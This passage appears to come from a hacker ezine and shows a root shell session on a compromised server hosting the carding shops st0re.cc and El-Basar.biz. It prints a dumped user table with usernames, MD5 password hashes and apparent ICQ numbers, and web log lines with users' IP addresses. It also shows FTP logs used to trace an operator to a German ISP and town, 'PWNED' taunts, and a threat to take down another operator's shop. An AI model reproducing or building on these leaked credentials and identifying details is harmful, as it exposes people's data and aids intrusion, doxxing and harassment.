|   9216 | opfa          | 01fc7192adba9cbba78b612ebeca6b66 |              |      11 |      0 |   | 
|   9223 | ivory         | 00b86e77b9f76fc1f466555b6af345f8 |              |      10 |      0 |   | 
|   9253 | blur121       | 7e4ea1bf5ca4e36d14e6296e485970f2 |              |      10 |      0 |   | 
|   9590 | kani2012      | ec11aacc5832b63f02f1269e89d3cdd7 | 858223       |       7 |      0 |   | 
|   9269 | drm1hy        | c6cb19878e6a335d4fabb115ca8e3605 |              |      24 |      0 |   | 
|   9273 | TrOvEjAr      | 9378884c5f76bf23f5aaedd1035017ba | 234307423    |      20 |      0 |   | 
|   9275 | gist505       | fcdd4eae6aff919545ff68b6e3943b91 |              |    8.98 |      0 |   | 
|   9298 | mrgreen       | 824a67f29e97b8798a9df7f00189f3e1 |              |      35 |      0 |   | 
|   9307 | GStar         | 2472ee727ed8de9a818fc657a6895646 |              |      10 |      0 |   | 
|   9310 | Domi93        | b36d331451a61eb2d76860e00c347396 |              |       8 |      0 |   | 
|   9348 | pwned         | 530ea1472e71035353d32d341ecf6343 |              |     6.5 |      0 |   | 
|   9357 | darkt0wn      | a56b6119d6c8be8e2d0d25bcfdca25c6 |              |      10 |      0 |   | 
|   9375 | optik         | d6ae345d39ca27dcc9c8e9c30a814041 |              |       7 |      0 |   | 
|   9397 | U3            | 93327f2856df1105a1318895ac44e684 | 645458882    |    20.2 |      0 |   | 
|   9410 | mule22        | d27c8e6c3222ea5da09eb7f0f9d56818 |              |       7 |      0 |   | 
|   9448 | BL4cKKS       | cdbec512b7a848722346013aa3e44f8b |              |       7 |      0 |   | 
|   9508 | PEPPEP        | 6ec176f463121c7a1fc2f442ba22e937 |              |       6 |      0 |   | 
|   9534 | Cardercc      | 461ae6b500f5802d4d52b34643cdcc6e |              |      11 |      0 |   | 
|   9599 | nolandro      | 78f5cf8d0ee4f6b1e612a36954c1254d |              |      50 |      0 |   | 
|   9600 | KoKaiiiN      | dc74e595f9938b1ea1f1a078ae154949 | 363727670    |       6 |      0 |   | 
|   9618 | D3DMan        | e78e0c9c18a6490ef56c3ffe837e0fca |              |    10.5 |      0 |   | 
|   9621 | Abdulleben    | 25d55ad283aa400af464c76d713c07ad |              |     6.5 |      0 |   | 
|   9631 | sexonthebeach | 2dfbaaecbe98198ace8c554cc426b6d4 |              |      44 |      0 |   | 
|   9701 | heiko4321     | 12a6265a271b7b23e943f5986d80d190 |              |     7.5 |      0 |   | 
|   9726 | albozz        | d41d8cd98f00b204e9800998ecf8427e |              |      18 |      0 |   | 
|   9729 | Spexti        | 4dfd9542414fed623b432aee923618d0 |              |       6 |      0 |   | 
|   9791 | Bastler       | a278ec2edc9105bd52fe62254522ecd4 |              |      20 |      0 |   | 
|   9820 | vima          | f3674879f5e18c7989e02235da302cc9 |              |      20 |      0 |   | 
|   9822 | xNiightx      | ef605602b07ae6b27054649d92e28b3e | 474300093    |      19 |      0 |   | 
|   9824 | bergwerk      | c4fd4f3a6e0f9ccbc309a510a7efbad4 |              |      12 |      0 |   | 
|   9948 | funny333      | 56a876cce8c5d91ed47db1b742573d36 |              |    17.5 |      0 |   | 
|   9966 | Friedrich     | 28acec923aa820ebbe028955a5a46356 | ja           |       7 |      0 |   | 
|  10035 | Auzodiox      | 286119328282d5d64cf1a3a02aba6316 |              |      15 |      0 |   | 
|  10003 | donjuan       | 6d11921056f42e148b13a528c82d174e |              |     5.5 |      0 |   | 
|  10005 | hajo22        | 566a1fc42bc3fa17a3920221d2b24d34 |              |       6 |      0 |   | 
|  10032 | golem         | 62650cd9a5fb136dc137b155e4ae6f2a |              |    15.5 |      0 |   | 
|  10033 | blood         | 42ee64c24d1efcc4c1916074461854f3 |              |      10 |      0 |   | 
|  10051 | Technoboom    | 77711870d494d022654bcf842b603467 |              |       7 |      0 |   | 
|  10217 | LiBeRtY1338   | d41d8cd98f00b204e9800998ecf8427e | 634365955    |     9.1 |      0 |   | 
|  10085 | mo100         | 7cc5a8be611ccce374885048bc2a4848 |              |    32.5 |      0 |   | 
|  10575 | Twix2010      | 75a593a34aa5ba8e5e5788b7c899802e |              |       7 |      0 |   | 
|  10216 | Spagel        | 22243bfba05b9715e6303dacf7f66c90 |              |      30 |      0 |   | 
|  10391 | DerHase       | e99a18c428cb38d5f260853678922e03 |              |     7.5 |      0 |   | 
|  10290 | samsamsam3    | 03f828f4b26b4ebab502c56a78cc0580 | 600148357    |      70 |      0 |   | 
|  10304 | dasfrek       | de68fbe75420c572d172d456ec9a48b3 | 158204790    |      13 |      0 |   | 
|  10402 | Kevko         | a0017f523db6e51a75f02647a89280bd | 480179       |       9 |      0 |   | 
|  10440 | ahm123        | 97c45c9bb4cea4d08721d101388578bb |              |       7 |      0 |   | 
|  10555 | homer         | f54146a3fc82ab17e5265695b23f646b |              |       9 |      0 |   | 
|  10557 | ccmajor       | 1fafd7a63f5980302a5cdaa790988b7b | 158545       |      10 |      0 |   | 
+--------+---------------+----------------------------------+--------------+---------+--------+---+
169 rows in set (0.01 sec)

mysql> Aborted

# cd /var/log/httpd

# Some recent ip adresses?^C

# grep "st0re.cc.*POST.*login_do.php" httpd_20110930_* httpd_access.log 
httpd_20110930_a.log:st0re.cc 91.23.167.77 2 30.09.11 03:30:01 "POST /login_do.php HTTP/1.0" 47627 637 341
httpd_20110930_a.log:st0re.cc 87.168.17.156 2 30.09.11 04:13:28 "POST /login_do.php HTTP/1.0" 8509 726 323
httpd_20110930_a.log:st0re.cc 178.162.135.234 2 30.09.11 04:52:16 "POST /login_do.php HTTP/1.0" 8323 705 323
httpd_20110930_a.log:st0re.cc 80.142.47.156 2 30.09.11 05:06:21 "POST /login_do.php HTTP/1.0" 8148 634 323
httpd_20110930_a.log:st0re.cc 212.150.184.230 2 30.09.11 08:19:53 "POST /login_do.php HTTP/1.0" 8213 652 323
httpd_20110930_a.log:st0re.cc 2.200.120.131 2 30.09.11 09:56:50 "POST /login_do.php HTTP/1.0" 8549 669 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 10:47:44 "POST /login_do.php HTTP/1.0" 8941 583 323
httpd_20110930_a.log:st0re.cc 95.211.13.145 2 30.09.11 10:50:13 "POST /login_do.php HTTP/1.0" 8095 635 323
httpd_20110930_a.log:st0re.cc 80.226.24.8 2 30.09.11 11:18:30 "POST /login_do.php HTTP/1.0" 8314 670 323
httpd_20110930_a.log:st0re.cc 79.253.2.25 2 30.09.11 11:27:54 "POST /login_do.php HTTP/1.0" 8574 720 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 11:32:49 "POST /login_do.php HTTP/1.0" 8150 583 323
httpd_20110930_a.log:st0re.cc 77.176.68.228 2 30.09.11 13:01:42 "POST /login_do.php HTTP/1.0" 8211 641 3411
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 13:19:38 "POST /login_do.php HTTP/1.0" 8286 583 323
httpd_20110930_a.log:st0re.cc 188.136.8.225 2 30.09.11 13:56:34 "POST /login_do.php HTTP/1.0" 8711 642 323
httpd_20110930_a.log:st0re.cc 92.241.168.24 2 30.09.11 14:31:08 "POST /login_do.php HTTP/1.0" 8377 630 323
httpd_20110930_a.log:st0re.cc 84.140.101.35 2 30.09.11 14:51:37 "POST /login_do.php HTTP/1.0" 8876 723 323
httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 15:34:17 "POST /login_do.php HTTP/1.0" 9479 788 341
httpd_20110930_a.log:st0re.cc 92.201.119.237 2 30.09.11 15:45:12 "POST /login_do.php HTTP/1.0" 8372 641 323
httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 15:57:19 "POST /login_do.php HTTP/1.0" 8163 633 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:04:08 "POST /login_do.php HTTP/1.0" 8246 583 323
httpd_20110930_a.log:st0re.cc 88.72.19.192 2 30.09.11 16:15:47 "POST /login_do.php HTTP/1.0" 8768 630 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:22:46 "POST /login_do.php HTTP/1.0" 8777 705 341
httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:24:21 "POST /login_do.php HTTP/1.0" 272729 732 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:26:26 "POST /login_do.php HTTP/1.0" 8575 723 323
httpd_20110930_a.log:st0re.cc 93.192.34.166 2 30.09.11 16:30:04 "POST /login_do.php HTTP/1.0" 8150 787 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 16:30:24 "POST /login_do.php HTTP/1.0" 8242 636 323
httpd_20110930_a.log:st0re.cc 178.7.135.0 2 30.09.11 16:33:20 "POST /login_do.php HTTP/1.0" 8378 648 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 16:43:58 "POST /login_do.php HTTP/1.0" 8185 583 323
httpd_20110930_a.log:st0re.cc 92.241.164.197 2 30.09.11 16:44:05 "POST /login_do.php HTTP/1.0" 8263 654 323
httpd_20110930_a.log:st0re.cc 77.10.175.234 2 30.09.11 16:48:12 "POST /login_do.php HTTP/1.0" 8888 761 323
httpd_20110930_a.log:st0re.cc 46.115.16.29 2 30.09.11 16:55:14 "POST /login_do.php HTTP/1.0" 8958 718 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 16:55:44 "POST /login_do.php HTTP/1.0" 8141 723 323
httpd_20110930_a.log:st0re.cc 88.76.37.149 2 30.09.11 16:59:33 "POST /login_do.php HTTP/1.0" 8468 643 323
httpd_20110930_a.log:st0re.cc 77.186.7.122 2 30.09.11 17:05:15 "POST /login_do.php HTTP/1.0" 8506 632 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:05:35 "POST /login_do.php HTTP/1.0" 8739 583 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 17:06:11 "POST /login_do.php HTTP/1.0" 8214 732 323
httpd_20110930_a.log:st0re.cc 91.53.197.228 2 30.09.11 17:07:00 "POST /login_do.php HTTP/1.0" 8094 787 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:09:32 "POST /login_do.php HTTP/1.0" 8230 583 323
httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 17:12:29 "POST /login_do.php HTTP/1.0" 8606 640 323
httpd_20110930_a.log:st0re.cc 87.122.41.84 2 30.09.11 17:15:16 "POST /login_do.php HTTP/1.0" 8181 633 323
httpd_20110930_a.log:st0re.cc 84.177.153.224 2 30.09.11 17:17:27 "POST /login_do.php HTTP/1.0" 8550 650 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:23:17 "POST /login_do.php HTTP/1.0" 8164 583 323
httpd_20110930_a.log:st0re.cc 92.224.62.134 2 30.09.11 17:25:51 "POST /login_do.php HTTP/1.0" 8164 642 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 17:50:25 "POST /login_do.php HTTP/1.0" 8288 583 323
httpd_20110930_a.log:st0re.cc 178.162.135.66 2 30.09.11 17:56:45 "POST /login_do.php HTTP/1.0" 8871 612 323
httpd_20110930_a.log:st0re.cc 77.8.111.185 2 30.09.11 18:00:22 "POST /login_do.php HTTP/1.0" 8204 635 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:06:05 "POST /login_do.php HTTP/1.0" 8037 583 323
httpd_20110930_a.log:st0re.cc 178.86.4.72 2 30.09.11 18:09:59 "POST /login_do.php HTTP/1.0" 8348 640 323
httpd_20110930_a.log:st0re.cc 87.156.226.177 2 30.09.11 18:15:41 "POST /login_do.php HTTP/1.0" 8184 650 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:32:35 "POST /login_do.php HTTP/1.0" 13208 583 323
httpd_20110930_a.log:st0re.cc 62.177.139.171 2 30.09.11 18:43:36 "POST /login_do.php HTTP/1.0" 8538 612 323
httpd_20110930_a.log:st0re.cc 188.99.237.187 2 30.09.11 18:44:23 "POST /login_do.php HTTP/1.0" 8195 631 323
httpd_20110930_a.log:st0re.cc 84.144.24.26 2 30.09.11 18:46:44 "POST /login_do.php HTTP/1.0" 8378 733 323
httpd_20110930_a.log:st0re.cc 212.18.213.207 2 30.09.11 18:58:16 "POST /login_do.php HTTP/1.0" 8107 583 323
httpd_20110930_a.log:st0re.cc 88.128.93.67 2 30.09.11 19:14:31 "POST /login_do.php HTTP/1.0" 8347 741 323
httpd_20110930_a.log:st0re.cc 84.159.35.59 2 30.09.11 19:28:20 "POST /login_do.php HTTP/1.0" 8304 644 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 19:35:08 "POST /login_do.php HTTP/1.0" 8222 732 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 19:43:28 "POST /login_do.php HTTP/1.0" 8076 641 323
httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 19:45:35 "POST /login_do.php HTTP/1.0" 8195 639 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 19:49:23 "POST /login_do.php HTTP/1.0" 8152 581 323
httpd_20110930_a.log:st0re.cc 87.156.29.114 2 30.09.11 19:52:03 "POST /login_do.php HTTP/1.0" 8481 723 323
httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:21 "POST /login_do.php HTTP/1.0" 8568 794 341
httpd_20110930_a.log:st0re.cc 217.231.145.151 2 30.09.11 20:08:34 "POST /login_do.php HTTP/1.0" 9612 793 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 20:10:43 "POST /login_do.php HTTP/1.0" 8277 723 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:14:09 "POST /login_do.php HTTP/1.0" 8427 581 323
httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:15:41 "POST /login_do.php HTTP/1.0" 8416 625 341
httpd_20110930_a.log:st0re.cc 92.225.99.187 2 30.09.11 20:16:47 "POST /login_do.php HTTP/1.0" 8292 641 323
httpd_20110930_a.log:st0re.cc 213.163.65.50 2 30.09.11 20:19:02 "POST /login_do.php HTTP/1.0" 8270 629 323
httpd_20110930_a.log:st0re.cc 84.166.216.59 2 30.09.11 20:36:40 "POST /login_do.php HTTP/1.0" 8410 721 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 20:51:21 "POST /login_do.php HTTP/1.0" 8349 732 323
httpd_20110930_a.log:st0re.cc 213.135.18.45 2 30.09.11 20:54:58 "POST /login_do.php HTTP/1.0" 8343 581 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 20:56:17 "POST /login_do.php HTTP/1.0" 8158 641 323
httpd_20110930_a.log:st0re.cc 95.118.133.136 2 30.09.11 21:14:05 "POST /login_do.php HTTP/1.0" 8708 641 323
httpd_20110930_a.log:st0re.cc 84.189.234.204 2 30.09.11 21:17:37 "POST /login_do.php HTTP/1.0" 8194 671 323
httpd_20110930_a.log:st0re.cc 87.139.98.60 2 30.09.11 21:23:18 "POST /login_do.php HTTP/1.0" 8082 644 323
httpd_20110930_a.log:st0re.cc 109.236.86.130 2 30.09.11 21:35:53 "POST /login_do.php HTTP/1.0" 8154 645 323
httpd_20110930_a.log:st0re.cc 93.186.200.12 2 30.09.11 21:45:37 "POST /login_do.php HTTP/1.0" 8409 627 341
httpd_20110930_a.log:st0re.cc 77.183.29.40 2 30.09.11 21:46:22 "POST /login_do.php HTTP/1.0" 8157 639 323
httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:30 "POST /login_do.php HTTP/1.0" 8119 622 341
httpd_20110930_a.log:st0re.cc 62.141.36.190 2 30.09.11 21:50:37 "POST /login_do.php HTTP/1.0" 8241 622 323
httpd_20110930_a.log:st0re.cc 94.220.183.63 2 30.09.11 21:53:11 "POST /login_do.php HTTP/1.0" 8070 723 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 21:53:33 "POST /login_do.php HTTP/1.0" 8254 636 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 22:07:29 "POST /login_do.php HTTP/1.0" 8648 732 323
httpd_20110930_a.log:st0re.cc 89.15.88.227 2 30.09.11 22:19:27 "POST /login_do.php HTTP/1.0" 8205 635 341
httpd_20110930_a.log:st0re.cc 80.239.242.78 2 30.09.11 22:21:00 "POST /login_do.php HTTP/1.0" 8402 646 323
httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:31:06 "POST /login_do.php HTTP/1.0" 8479 721 341
httpd_20110930_a.log:st0re.cc 91.10.251.46 2 30.09.11 22:33:29 "POST /login_do.php HTTP/1.0" 8240 720 323
httpd_20110930_a.log:st0re.cc 178.202.68.98 2 30.09.11 22:33:49 "POST /login_do.php HTTP/1.0" 14741 636 323
httpd_20110930_a.log:st0re.cc 77.24.94.72 2 30.09.11 22:34:14 "POST /login_do.php HTTP/1.0" 8203 663 341
httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:30 "POST /login_do.php HTTP/1.0" 8304 729 341
httpd_20110930_a.log:st0re.cc 82.195.234.50 2 30.09.11 22:36:38 "POST /login_do.php HTTP/1.0" 8228 730 323
httpd_20110930_a.log:st0re.cc 178.3.99.162 2 30.09.11 22:42:38 "POST /login_do.php HTTP/1.0" 8094 640 323
httpd_20110930_a.log:st0re.cc 80.137.199.182 2 30.09.11 23:08:46 "POST /login_do.php HTTP/1.0" 8207 732 323
httpd_20110930_a.log:st0re.cc 89.204.153.246 2 30.09.11 23:10:14 "POST /login_do.php HTTP/1.0" 8285 696 323
httpd_20110930_a.log:st0re.cc 79.192.107.57 2 30.09.11 23:20:54 "POST /login_do.php HTTP/1.0" 8307 639 323
httpd_20110930_a.log:st0re.cc 93.196.21.139 2 30.09.11 23:29:34 "POST /login_do.php HTTP/1.0" 8856 633 323
httpd_20110930_a.log:st0re.cc 2.213.95.13 2 30.09.11 23:50:22 "POST /login_do.php HTTP/1.0" 8379 633 323
httpd_20110930_a.log:st0re.cc 82.83.112.126 2 30.09.11 23:56:18 "POST /login_do.php HTTP/1.0" 8721 744 323
httpd_20110930_a.log:st0re.cc 77.20.159.112 2 01.10.11 00:20:55 "POST /login_do.php HTTP/1.0" 8354 643 323
httpd_20110930_a.log:st0re.cc 178.9.168.231 2 01.10.11 01:13:45 "POST /login_do.php HTTP/1.0" 9722 729 341
httpd_20110930_a.log:st0re.cc 84.59.159.134 2 01.10.11 01:35:23 "POST /login_do.php HTTP/1.0" 8207 646 323
httpd_20110930_a.log:st0re.cc 87.139.98.60 2 01.10.11 01:48:07 "POST /login_do.php HTTP/1.0" 9020 644 323
httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:56:01 "POST /login_do.php HTTP/1.0" 8930 640 341
httpd_20110930_a.log:st0re.cc 92.224.0.114 2 01.10.11 01:58:53 "POST /login_do.php HTTP/1.0" 8227 648 341
httpd_20110930_a.log:st0re.cc 195.71.18.209 2 01.10.11 02:40:09 "POST /login_do.php HTTP/1.0" 8594 630 323
httpd_20110930_a.log:st0re.cc 95.118.98.231 2 01.10.11 02:47:35 "POST /login_do.php HTTP/1.0" 8143 735 341
httpd_20110930_a.log:st0re.cc 95.222.50.203 2 01.10.11 03:00:42 "POST /login_do.php HTTP/1.0" 8455 637 323
httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:18 "POST /login_do.php HTTP/1.0" 8322 648 341
httpd_access.log:st0re.cc 79.247.250.2 2 01.10.11 03:25:30 "POST /login_do.php HTTP/1.0" 1543 648 341
httpd_access.log:st0re.cc 84.189.234.204 2 01.10.11 03:56:19 "POST /login_do.php HTTP/1.0" 8108 671 323
httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:31 "POST /login_do.php HTTP/1.0" 8725 629 341
httpd_access.log:st0re.cc 46.115.17.43 2 01.10.11 04:19:57 "POST /login_do.php HTTP/1.0" 8745 627 323
httpd_access.log:st0re.cc 84.74.179.83 2 01.10.11 05:17:41 "POST /login_do.php HTTP/1.0" 8227 724 323
httpd_access.log:st0re.cc 66.176.9.110 2 01.10.11 06:22:46 "POST /login_do.php HTTP/1.0" 8182 889 323
httpd_access.log:st0re.cc 84.171.65.229 2 01.10.11 11:16:40 "POST /login_do.php HTTP/1.0" 10603 646 323
httpd_access.log:st0re.cc 213.135.18.45 2 01.10.11 11:32:59 "POST /login_do.php HTTP/1.0" 8670 581 323
httpd_access.log:st0re.cc 92.224.58.242 2 01.10.11 11:59:27 "POST /login_do.php HTTP/1.0" 8330 633 323
httpd_access.log:st0re.cc 115.184.3.252 2 01.10.11 12:12:22 "POST /login_do.php HTTP/1.0" 8176 699 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 12:41:47 "POST /login_do.php HTTP/1.0" 8422 787 323
httpd_access.log:st0re.cc 89.0.20.128 2 01.10.11 13:00:16 "POST /login_do.php HTTP/1.0" 8213 647 323
httpd_access.log:st0re.cc 85.17.97.27 2 01.10.11 13:31:59 "POST /login_do.php HTTP/1.0" 8667 634 341
httpd_access.log:st0re.cc 212.150.184.230 2 01.10.11 13:37:20 "POST /login_do.php HTTP/1.0" 8082 652 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:48:36 "POST /login_do.php HTTP/1.0" 8041 787 323
httpd_access.log:st0re.cc 80.142.41.35 2 01.10.11 13:56:41 "POST /login_do.php HTTP/1.0" 8142 675 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 13:58:43 "POST /login_do.php HTTP/1.0" 1754 787 323
httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:46 "POST /login_do.php HTTP/1.0" 8161 636 341
httpd_access.log:st0re.cc 178.202.68.98 2 01.10.11 14:09:49 "POST /login_do.php HTTP/1.0" 8236 636 323
httpd_access.log:st0re.cc 92.226.41.234 2 01.10.11 14:09:52 "POST /login_do.php HTTP/1.0" 8429 644 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:30:23 "POST /login_do.php HTTP/1.0" 8060 794 341
httpd_access.log:st0re.cc 87.122.41.84 2 01.10.11 14:42:56 "POST /login_do.php HTTP/1.0" 8176 633 323
httpd_access.log:st0re.cc 91.53.210.228 2 01.10.11 14:45:00 "POST /login_do.php HTTP/1.0" 1750 787 323
httpd_access.log:st0re.cc 92.224.11.28 2 01.10.11 15:03:01 "POST /login_do.php HTTP/1.0" 8030 664 341
httpd_access.log:st0re.cc 88.74.202.98 2 01.10.11 15:45:47 "POST /login_do.php HTTP/1.0" 8167 661 323
httpd_access.log:st0re.cc 95.118.133.136 2 01.10.11 15:50:25 "POST /login_do.php HTTP/1.0" 8025 641 323
httpd_access.log:st0re.cc 217.79.178.233 2 01.10.11 15:52:07 "POST /login_do.php HTTP/1.0" 8115 726 323
httpd_access.log:st0re.cc 77.188.205.152 2 01.10.11 15:56:27 "POST /login_do.php HTTP/1.0" 8137 643 323
httpd_access.log:st0re.cc 87.122.34.237 2 01.10.11 15:58:01 "POST /login_do.php HTTP/1.0" 8125 635 323
httpd_access.log:st0re.cc 212.117.165.197 2 01.10.11 16:25:15 "POST /login_do.php HTTP/1.0" 8005 646 323
httpd_access.log:st0re.cc 46.20.44.58 2 01.10.11 16:26:19 "POST /login_do.php HTTP/1.0" 7911 638 341
httpd_access.log:st0re.cc 93.223.63.24 2 01.10.11 16:39:27 "POST /login_do.php HTTP/1.0" 8066 631 323
httpd_access.log:st0re.cc 77.20.159.112 2 01.10.11 16:47:10 "POST /login_do.php HTTP/1.0" 8025 643 323
httpd_access.log:st0re.cc 109.236.86.130 2 01.10.11 16:59:19 "POST /login_do.php HTTP/1.0" 1524 719 323
httpd_access.log:st0re.cc 88.69.129.69 2 01.10.11 17:01:04 "POST /login_do.php HTTP/1.0" 8045 721 323
httpd_access.log:st0re.cc 62.141.46.134 2 01.10.11 17:06:19 "POST /login_do.php HTTP/1.0" 8112 645 323
httpd_access.log:st0re.cc 93.133.47.182 2 01.10.11 17:14:46 "POST /login_do.php HTTP/1.0" 8307 622 341

# And who is the guy behind that crap?^C

# last | grep mmgen
mmgen            ftp      212.150.184.230  Mon Oct  3 16:58 - 16:59  (00:01)
mmgen            ftp      212.150.184.230  Mon Oct  3 16:57 - 16:58  (00:01)
mmgen            ftp      212.150.184.230  Mon Oct  3 16:43 - 16:44  (00:01)
mmgen            ftp      212.150.184.230  Mon Oct  3 16:10 - 16:11  (00:01)
mmgen            ftp      212.150.184.230  Mon Oct  3 16:10 - 16:13  (00:03)
mmgen            ftp      212.150.184.230  Mon Oct  3 16:04 - 16:05  (00:01)
mmgen            ftp      212.150.184.230  Mon Oct  3 15:54 - 16:00  (00:05)
mmgen            ftp      212.150.184.230  Mon Oct  3 15:54 - 15:54  (00:00)
mmgen            ftp      212.150.184.230  Mon Oct  3 15:54 - 15:57  (00:03)

# Israel does not look that interesting...^C

# grep mgen.*78 /var/log/proftpd-transfer.log
Sun Dec 19 14:56:29 2010 0 92.241.164.197 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180253783625111 b _ d r mmgen ftp 0 * c
Fri Jan 14 23:16:40 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180257808454951 a _ d r mmgen ftp 0 * c
Sun Jan 23 16:36:30 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180256065317802 a _ d r mmgen ftp 0 * c
Thu Jan 27 23:14:04 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ o r mmgen ftp 0 * c
Thu Jan 27 23:14:07 2011 0 212.117.174.26 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ o r mmgen ftp 0 * c
Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250537839337 a _ d r mmgen ftp 0 * c
Thu Jan 27 23:17:39 2011 0 78.42.186.98 0 /home/mmgen/st0re.cc/u81vns057fvb3869vgic/track/6337180250621167843 a _ d r mmgen ftp 0 * c

78.42.186.98 resolves to  Kabel  Baden-Wuerttemberg  GmbH  &  Co.  KG,
Muellheim in Germany. Looks like someone  did  not  constantly  use  a
proxy. Means you are officially 
   .
  / \
  | |              
  |.|             PWNED LOL!
  |.|            / 
  |:|      __   /
,_|:|_,   /  )
  (Oo    / _I_
   +\ \  || __|
      \ \||___|
        \ /.:.\-\
         |.:. /-----\
         |___|::pwn::|
         /   |:<_T_>:|
        |_____\ ::: /
         | |  \ \:/
         | |   | |
         \ /   | \___
         / |   \_____\
         
Alright people let's keep the show going with El-Basar.biz ...

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((========{  El-Basar.biz  }=======-------
    /'  ' '()/~' '.(, |
 ,;(      )||     |  ~ Searching for  "El-Bazar.biz" on google gives a
,;' \    /-(.;,   )  good impression of what's  being sold there.  You
     ) /       ) /   can  buy one week  of  DDOS to take down one web-
    //         ||    site for 250 Euros. You get 10  US  CCs   without
   )_\         )_\  DOB (date of birth) for 5 Euros. And  you can even
buy 50g of MDMA crystals for 2000 Euros. Hilarious! El-Basar is  being
run by some guy called Ganymedes and was hosted on the same server  as
St0re.cc. However it seems  like  Ganymedes  has  moved  his  shop  to
another location which sadly has not been backdoored by us so far  and
thus will not make it into this issue of our ezine. Notwithstanding he
left enough data on his old box, but we must say,  Ganymedes,  if  you
don't take down your store, we will be so kind and  do  that  for  you
sooner or later. Thanks.

# pwd
/home

# ls -la
total 116
drwx--x--x  28 root           wheel  1024 Sep 14 17:31 .
drwx--x--x  18 root           wheel   512 Apr 12 19:59 ..
drwxrwx---  13 alg            www    1024 Feb 19  2011 alg
drwxr-x---   4 ayoga          www     512 Apr 23  2009 ayoga
drwxr-x---   5 crank2010      www     512 Dec 27  2009 crank2010
drwxr-x---   4 exchanger      www     512 Mar 31  2010 exchanger
drwxr-x---   6 filip          www     512 Jul 16  2010 filip
drwxr-x---   5 ganymedes      www     512 Oct  5 21:43 ganymedes
drwxr-x---   6 garf           www     512 Apr 16 02:26 garf
drwxr-x---   4 lordknight     www     512 Jan  3  2010 lordknight
drwxr-x---   4 madrage        www     512 Jan 10  2010 madrage
drwxrwxr-x   5 margosha       www     512 Sep  8 16:22 margosha
drwxr-x---   7 mmgen          www     512 Jun 11 13:18 mmgen
drwxr-x---   9 mr101          www     512 Apr  7  2010 mr101
drwxr-x---   4 msk            www     512 May 20  2009 msk
drwxr-x---   4 muraaat        www     512 Aug 29 20:59 muraaat
drwxr-x---   7 nukeuploads    www     512 Dec  2  2009 nukeuploads
drwxr-x---   8 onlineschauen  www     512 Oct  1 23:57 onlineschauen
drwxr-x---   4 pavlrse        www     512 Aug 21 03:32 pavlrse
drwxr-x---   8 propiska       www     512 Nov 19  2010 propiska
drwxr-x---   5 scenehack      www     512 Feb 22  2010 scenehack
drwxr-x---   4 snetwork       www     512 Jul 14 22:01 snetwork
drwxr-x---   5 szenevz        www     512 Mar 11  2010 szenevz
drwxr-x---   2 test4me        www     512 Sep  2 01:39 test4me
drwxr-x---   4 thefuelru      www     512 Jan 22  2010 thefuelru
drwxr-x---   4 useresu        www     512 Aug 19 11:27 useresu
drwxr-x---   4 useresu1       www    3584 Aug 19 11:47 useresu1
drwxrwxr-x   6 vestacomp      www     512 Dec 20  2010 vestacomp

# cd ganymedes

# ls -la
total 1180
drwxr-x---   5 ganymedes  www       512 Oct  5 21:43 .
drwx--x--x  28 root       wheel    1024 Sep 14 17:31 ..
